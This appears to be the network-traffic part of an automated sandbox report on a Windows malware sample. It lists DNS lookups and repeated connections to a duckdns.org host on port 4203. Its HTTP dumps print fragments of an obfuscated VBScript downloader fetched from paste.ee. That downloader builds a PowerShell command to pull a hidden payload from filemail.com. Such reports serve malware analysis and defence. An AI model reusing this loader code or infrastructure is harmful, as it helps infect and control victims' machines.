                                                                                                        Nov 20, 2024 20:34:30.938050032 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:31.083458900 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:31.093857050 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:31.213582039 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:31.213727951 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:31.333493948 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:31.994338036 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:32.047380924 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:32.196288109 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:32.255923033 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:41.795052052 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:42.017294884 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:42.017368078 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:42.137330055 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:42.454184055 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:42.500560999 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:42.658628941 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:42.660139084 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:42.779814959 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:42.779905081 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:42.899578094 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.063404083 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:53.184571981 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.185981035 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:53.306739092 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.618086100 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.672429085 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:53.819226027 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.845809937 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:53.965465069 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:34:53.965656996 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:34:54.085963964 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:02.236502886 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:02.281963110 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:02.437834978 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:02.484978914 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:04.344696045 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:04.464688063 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:04.464843988 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:04.584660053 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:04.896163940 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:04.938138008 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:05.097203970 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:05.099534035 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:05.220006943 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:05.220128059 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:05.346154928 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:15.626106977 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:15.748764038 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:15.749939919 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:15.871835947 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:16.180547953 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:16.235021114 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:16.384253979 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:16.386888027 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:16.506671906 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:16.507447958 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:16.627263069 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:26.907340050 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:27.027964115 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:27.028075933 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:27.151051044 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:27.482131004 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:27.531938076 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:27.682049036 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:27.683957100 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:27.803502083 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:27.804435015 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:27.923993111 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:32.014499903 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:32.063172102 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:32.215614080 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:32.266247988 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:41.344924927 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:41.465468884 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:41.465533018 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:41.588346004 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:41.896281958 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:41.938152075 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:42.097968102 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:42.098681927 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:42.219378948 CET420349804181.71.217.114192.168.2.6
                                                                                                        Nov 20, 2024 20:35:42.219499111 CET498044203192.168.2.6181.71.217.114
                                                                                                        Nov 20, 2024 20:35:42.340003014 CET420349804181.71.217.114192.168.2.6
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 20, 2024 20:33:28.923805952 CET5186653192.168.2.61.1.1.1
                                                                                                        Nov 20, 2024 20:33:29.290708065 CET53518661.1.1.1192.168.2.6
                                                                                                        Nov 20, 2024 20:33:46.493076086 CET5405253192.168.2.61.1.1.1
                                                                                                        Nov 20, 2024 20:33:46.871555090 CET53540521.1.1.1192.168.2.6
                                                                                                        Nov 20, 2024 20:34:08.616070032 CET5219653192.168.2.61.1.1.1
                                                                                                        Nov 20, 2024 20:34:08.998233080 CET53521961.1.1.1192.168.2.6
                                                                                                        Nov 20, 2024 20:34:16.354878902 CET6315453192.168.2.61.1.1.1
                                                                                                        Nov 20, 2024 20:34:16.667047024 CET53631541.1.1.1192.168.2.6
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Nov 20, 2024 20:33:28.923805952 CET192.168.2.61.1.1.10x5425Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:33:46.493076086 CET192.168.2.61.1.1.10xe36cStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:34:08.616070032 CET192.168.2.61.1.1.10x737aStandard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:34:16.354878902 CET192.168.2.61.1.1.10x5c08Standard query (0)deadpoolstart2025.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Nov 20, 2024 20:33:29.290708065 CET1.1.1.1192.168.2.60x5425No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:33:29.290708065 CET1.1.1.1192.168.2.60x5425No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:33:46.871555090 CET1.1.1.1192.168.2.60xe36cNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:33:46.871555090 CET1.1.1.1192.168.2.60xe36cNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:34:08.998233080 CET1.1.1.1192.168.2.60x737aNo error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                                                                        Nov 20, 2024 20:34:16.667047024 CET1.1.1.1192.168.2.60x5c08No error (0)deadpoolstart2025.duckdns.org181.71.217.114A (IP address)IN (0x0001)false
                                                                                                        • paste.ee
                                                                                                        • 1017.filemail.com
                                                                                                        • files.catbox.moe
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649707172.67.187.200802732C:\Windows\System32\wscript.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Nov 20, 2024 20:33:29.419833899 CET173OUTGET /d/0jfAN HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        Accept-Language: en-CH
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: paste.ee
                                                                                                        Nov 20, 2024 20:33:30.780643940 CET968INHTTP/1.1 301 Moved Permanently
                                                                                                        Date: Wed, 20 Nov 2024 19:33:30 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Location: https://paste.ee/d/0jfAN
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6hQuFzWkFtIvA5GY4UOFu15MZB4Vk9EHilJHvKMZgnKoUwML6czw7GJApaVuWlTKN5%2BaiDRUylJXVI8jYvwt3lgtujizcCNRY%2BCCiu7hNUaeDdBKbfzbFg0wNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e5adf412b271a07-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1894&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                        Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.649708172.67.187.2004432732C:\Windows\System32\wscript.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-11-20 19:33:32 UTC173OUTGET /d/0jfAN HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept: */*
                                                                                                        Accept-Language: en-CH
                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                        Host: paste.ee
                                                                                                        2024-11-20 19:33:32 UTC1238INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 20 Nov 2024 19:33:32 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Cache-Control: max-age=2592000
                                                                                                        strict-transport-security: max-age=63072000
                                                                                                        x-frame-options: DENY
                                                                                                        x-content-type-options: nosniff
                                                                                                        x-xss-protection: 1; mode=block
                                                                                                        content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbjI%2FTkZaDDrTF%2Bj%2BSicJBAaVCCcDB58Tgk7ej9oXYiRCljHu56UBhIXORSrxWvooZdz%2Ba%2BeXvL2D3nydQRU9qHSkcQK8yoqN5M8COCImh%2BU9n3TUxkzZiBFpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8e5adf4d093b19cf-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-11-20 19:33:32 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 30 32 37 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 32 30 38 31 30 39 26 63 77 6e 64 3d 32 35 32 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 63 30 31 31 35 30 35 32 35 31 33 35 64 61 33 32 26 74 73 3d 35 35 39 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=2027&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1208109&cwnd=252&unsent_bytes=0&cid=c01150525135da32&ts=559&x=0"
                                                                                                        2024-11-20 19:33:32 UTC1310INData Raw: 32 66 37 66 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 52 65 70 6c 61 63 65 53 74 72 69 6e 67 28 42 79 56 61 6c 20 74 65 78 74 6f 2c 20 42 79 56 61 6c 20 70 72 6f 63 75 72 61 2c 20 42 79 56 61 6c 20 73 75 62 73 74 69 74 75 69 29 0d 0a 20 20 20 20 44 69 6d 20 70 6f 73 69 63 61 6f 0d 0a 20 20 20 20 70 6f 73 69 63 61 6f 20 3d 20 49 6e 53 74 72 28 74 65 78 74 6f 2c 20 70 72 6f 63 75 72 61 29 0d 0a 20 20 20 20 0d 0a 20 20 20 20 44 6f 20 57 68 69 6c 65 20 70 6f 73 69 63 61 6f 20 3e 20 30 0d 0a 20 20 20 20 20 20 20 20 74 65 78 74 6f 20 3d 20 4c 65 66 74 28 74 65 78 74 6f 2c 20 70 6f 73 69 63 61 6f 20 2d 20 31 29 20 26 20 73 75 62 73 74 69 74 75 69 20 26 20 4d 69 64 28 74 65 78 74 6f 2c 20 70 6f 73 69 63 61 6f 20 2b 20 4c 65 6e 28 70 72 6f 63 75 72 61 29 29 0d
                                                                                                        Data Ascii: 2f7fFunction ReplaceString(ByVal texto, ByVal procura, ByVal substitui) Dim posicao posicao = InStr(texto, procura) Do While posicao > 0 texto = Left(texto, posicao - 1) & substitui & Mid(texto, posicao + Len(procura))
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 6c 2e 52 75 6e 20 4e 57 43 4e 2c 20 30 2c 20 74 72 75 65 0d 0a 45 6e 64 20 49 66 0d 0a 20 20 20 20 20 20 20 20 4f 6e 20 45 72 72 6f 72 20 52 65 73 75 6d 65 20 4e 65 78 74 0d 0a 0d 0a 20 20 20 20 20 20 20 20 76 6e 71 68 76 20 3d 20 22 4a 69 67 67 4a 48 42 54 53 45 39 4e 5a 56 73 30 58 53 73 6b 63 48 4e 49 54 30 31 46 57 7a 4d 77 58 53 73 6e 57 43 63 70 49 43 67 6f 4a 31 42 6f 55 6d 6c 74 59 57 64 6c 56 58 4a 73 4a 79 73 6e 49 44 30 67 5a 6c 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 68 5a 61 48 52 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 30 63 48 4d 36 4c 79 38 78 4d 44 45 33 4c 6d 5a 70 62 47 56 74 59 57 6c 73 4c 6d 4e 76 62 53 39 68 63 47 6b 76 5a 69 63 72 4a 32 6c 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 73 5a 53 39 6e 5a 58 51 2f 5a 69 63 72
                                                                                                        Data Ascii: l.Run NWCN, 0, trueEnd If On Error Resume Next vnqhv = "JiggJHBTSE9NZVs0XSskcHNIT01FWzMwXSsnWCcpICgoJ1BoUmltYWdlVXJsJysnID0gZlZQFOEDIRUYCMKBShZaHRZQFOEDIRUYCMKBS0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZicrJ2lZQFOEDIRUYCMKBSsZS9nZXQ/Zicr
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 45 78 6c 62 6d 64 30 61 43 41 39 49 46 42 6f 55 6d 56 75 5a 45 6c 75 5a 47 56 34 49 43 30 67 55 47 68 53 63 33 52 68 63 6e 52 4a 62 6d 52 6c 65 44 74 51 61 46 4a 69 59 58 4e 6c 4e 6a 52 44 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 62 32 31 74 59 57 35 6b 49 44 30 67 55 47 68 53 61 57 31 68 5a 32 56 55 5a 58 68 30 4c 6c 4e 31 59 6e 4e 30 63 6d 6c 75 5a 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 79 68 51 61 46 4a 7a 22 0d 0a 20 20 20 20 20 20 20 20 76 6e 71 68 76 20 3d 20 76 6e 71 68 76 20 26 20 22 64 47 46 79 64 45 6c 75 5a 47 56 34 4a 79 73 6e 4c 43 42 51 61 46 4a 69 59 58 4e 6c 4e 6a 52 4d 5a 57 35 6e 64 47 67 70 4f 31 42 6f 55 6d 4a 68 63 32 55 32 4e 46 4a 6c 64 6d 56 79 63 32 56 6b 49 44 30 67 4c 57 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 70
                                                                                                        Data Ascii: Exlbmd0aCA9IFBoUmVuZEluZGV4IC0gUGhSc3RhcnRJbmRleDtQaFJiYXNlNjRDZQFOEDIRUYCMKBSb21tYW5kID0gUGhSaW1hZ2VUZXh0LlN1YnN0cmluZZQFOEDIRUYCMKBSyhQaFJz" vnqhv = vnqhv & "dGFydEluZGV4JysnLCBQaFJiYXNlNjRMZW5ndGgpO1BoUmJhc2U2NFJldmVyc2VkID0gLWZQFOEDIRUYCMKBSp
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 6c 68 5a 5a 47 56 7a 59 58 52 70 64 6d 46 6b 62 32 5a 59 57 53 6b 70 4f 79 63 70 4c 6c 4a 46 63 47 78 42 51 30 55 6f 4b 46 74 6a 61 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 45 46 53 58 54 45 77 4d 69 74 62 59 32 68 42 55 6c 30 34 4f 43 74 62 59 32 68 42 55 6c 30 34 4f 53 6b 73 57 33 4e 30 55 6b 6c 4f 5a 31 31 62 59 32 68 42 55 6c 30 7a 4f 53 6b 75 55 6b 56 77 62 45 46 44 52 53 67 6f 57 32 4e 6f 51 56 4a 64 4d 54 45 33 4b 31 74 6a 61 45 46 53 58 54 63 32 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 4b 31 74 6a 61 45 46 53 58 54 67 30 4b 53 77 6e 66 43 63 70 4c 6c 4a 46 63 47 78 42 51 30 55 6f 4a 31 42 6f 55 69 63 73 4a 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 79 51 6e 4b 53 41 70 22 0d 0a 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 61 63 61 72 72 65
                                                                                                        Data Ascii: lhZZGVzYXRpdmFkb2ZYWSkpOycpLlJFcGxBQ0UoKFtjaZQFOEDIRUYCMKBSEFSXTEwMitbY2hBUl04OCtbY2hBUl04OSksW3N0UklOZ11bY2hBUl0zOSkuUkVwbEFDRSgoW2NoQVJdMTE3K1tjaEFSXTc2ZQFOEDIRUYCMKBSK1tjaEFSXTg0KSwnfCcpLlJFcGxBQ0UoJ1BoUicsJZQFOEDIRUYCMKBSyQnKSAp" Dim acarre
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 53 74 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 72 69 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 6e 67 28 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 5b 73 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 79 73 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 74 65 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 6d 2e 43 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 6f 6e 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 76 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 65 72 5a 51 46 4f 45 44
                                                                                                        Data Ascii: JJbnw = JJbnw & "StZQFOEDIRUYCMKBS" JJbnw = JJbnw & "riZQFOEDIRUYCMKBSng(" JJbnw = JJbnw & "[sZQFOEDIRUYCMKBSys" JJbnw = JJbnw & "teZQFOEDIRUYCMKBSm.CZQFOEDIRUYCMKBSon" JJbnw = JJbnw & "vZQFOEDIRUYCMKBSerZQFOED
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 4e 6f 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 50 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 72 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 6f 66 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 69 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 6c 65 20 2d 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 63 6f 6d 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 6d 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 61 22 0d 0a 20 20 20 20 20 20 20 20 4a 4a 62 6e 77 20 3d 20 4a 4a 62 6e 77 20 26 20 22 6e 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 64 20 24 5a 51 46 4f 45 44 49 52 55 59 43 4d 4b 42 53 4f 22 0d 0a 20
                                                                                                        Data Ascii: FOEDIRUYCMKBSNo" JJbnw = JJbnw & "PZQFOEDIRUYCMKBSrZQFOEDIRUYCMKBSof" JJbnw = JJbnw & "iZQFOEDIRUYCMKBSle -ZQFOEDIRUYCMKBScom" JJbnw = JJbnw & "mZQFOEDIRUYCMKBSa" JJbnw = JJbnw & "nZQFOEDIRUYCMKBSd $ZQFOEDIRUYCMKBSO"
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 20 20 45 73 63 61 70 65 20 3d 20 45 73 63 61 70 65 20 26 20 22 26 61 70 6f 73 3b 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 65 6c 73 65 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 45 73 63 61 70 65 20 3d 20 45 73 63 61 70 65 20 26 20 4d 69 64 28 73 74 72 2c 20 69 2c 20 31 29 0d 0a 20 20 20 20 20 20 20 20 65 6e 64 20 73 65 6c 65 63 74 0d 0a 20 20 20 20 6e 65 78 74 0d 0a 65 6e 64 20 66 75 6e 63 74 69 6f 6e 0d 0a 0d 0a 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 20 20 20 20 0d 0a 27 20 43 68 65 63 6b 73 20 69 66 20 74 68 69 73 20 73 63 72 69 70 74 20 69 73 20 72 75 6e 6e 69 6e 67 20 75 6e 64 65 72 20 63 73 63 72 69 70 74 2e 65 78 65 0d 0a 0d 0a 70 72 69 76 61 74 65 20 66 75 6e 63 74 69 6f 6e 20 73 65 67 72 65
                                                                                                        Data Ascii: Escape = Escape & "&apos;" case else Escape = Escape & Mid(str, i, 1) end select nextend function''''''''''''''''''''' ' Checks if this script is running under cscript.exeprivate function segre
                                                                                                        2024-11-20 19:33:32 UTC1369INData Raw: 74 65 4c 69 6e 65 20 65 72 72 44 65 73 63 0d 0a 20 20 20 20 20 20 20 20 57 53 63 72 69 70 74 2e 51 75 69 74 28 61 62 73 6f 72 76 65 64 6f 69 72 6f 29 0d 0a 20 20 20 20 65 6e 64 20 69 66 0d 0a 65 6e 64 20 73 75 62 0d 0a 0d 0a 27 20 41 73 73 65 72 74 20 4e 61 6d 65 64 20 41 72 67 75 6d 65 6e 74 20 4c 65 6e 67 74 68 0d 0a 70 72 69 76 61 74 65 20 73 75 62 20 41 53 53 45 52 54 4e 41 4c 28 6e 61 6d 65 64 41 72 67 29 0d 0a 20 20 20 20 69 66 20 4c 65 6e 28 77 73 6d 61 6e 43 6d 64 4c 69 6e 65 4f 62 6a 2e 41 72 67 75 6d 65 6e 74 28 6e 61 6d 65 64 41 72 67 29 29 20 3d 20 30 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 73 74 64 45 72 72 2e 57 72 69 74 65 4c 69 6e 65 20 72 65 73 75 72 67 69 6d 65 6e 74 6f 28 22 4c 5f 45 52 52 5f 4d 65 73 73 61 67 65 22 29 20 26 20 72
                                                                                                        Data Ascii: teLine errDesc WScript.Quit(absorvedoiro) end ifend sub' Assert Named Argument Lengthprivate sub ASSERTNAL(namedArg) if Len(wsmanCmdLineObj.Argument(namedArg)) = 0 then stdErr.WriteLine resurgimento("L_ERR_Message") & r
